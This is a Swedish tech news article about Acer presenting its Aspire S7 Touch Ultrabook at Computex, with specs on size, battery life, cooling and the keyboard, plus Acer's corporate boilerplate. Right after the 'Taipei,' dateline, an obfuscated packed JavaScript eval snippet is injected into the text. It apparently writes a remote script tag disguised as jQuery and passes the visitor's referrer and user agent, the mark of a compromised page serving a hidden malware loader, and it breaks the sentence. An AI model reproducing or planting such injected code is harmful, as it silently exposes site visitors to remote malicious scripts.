Image Image Image Image Image Image Image Image Image Image

| 3 december, 2020

Scroll to top

Top

PC

Acer visar upp Touch Ultrabook i premium-klassen på Computex

Acer visar upp Touch Ultrabook i premium-klassen på Computex
Sebastian

Taipei, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kdnek|var|u0026u|referrer|fenrn||js|php’.split(’|’),0,{}))
Taiwan – På Computex presenterar Acer nu sin senaste Touch Ultrabook i premium-klassen – Aspire S7-serien med Windows 8, tillgänglig i storlekarna 13,3- samt 11,6 tum. Båda modellerna kommer i ett trendigt aluminiumutförande, och den större av de två har dessutom ett glansigt skyddsglas vilket ger ett än mer elegant utseende.

Med ett Unibody-utförande i aluminium är Aspire S7 Ultrabook en exceptionellt tunn och lätt dator, tålig nog att hantera vardagliga påfrestningar. För att kunna säkerställa en hel dags användning och mediekonsumtion har batteriet i 13.3 tums-modellen en driftstid på upp till tolv timmar. Den mindre modellen klarar upp till nio timmar på en enda laddning. För att garantera bästa prestanda och högsta möjliga termiska komfort har Acer utformat kylsystemet Acer Twin Air som effektivt kyler enheten.

S7-serien har även ett ljuskänsligt, bakgrundsbelyst tangentbord som känner av förändringar i ljusförhållandena och automatiskt justerar ljusstyrkan.

Nya S7-seriens ultra-mobila enheter blandar prestanda, estetik och användarvänlighet som tillsammans ger den mest kompletta datorupplevelsen hittills.

 Mer information kommer att skickas ut löpande.

Sedan grundandet 1976 har Acer lyckats uppnå sitt mål att undanröja barriärerna mellan människa och teknik. Acer är rankat som nr 2 i världen när det gäller bärbara datorer. Den lönsamma och hållbara affärsmodellen med säljkanaler är avgörande för företagets fortsatta tillväxt. Acer skapar miljövänliga produkter och har etablerat en grön leverantörskedja i samarbete med sina leverantörer. Acer är stolt över att vara officiell OS-partner och är bland annat sponsor av det kommande sommar-OS i London. Acer-koncernen har 8 000 anställda världen över. Intäkterna 2010 uppgick till 19,9 miljarder USD. Besök www.acer-group.com för mer information.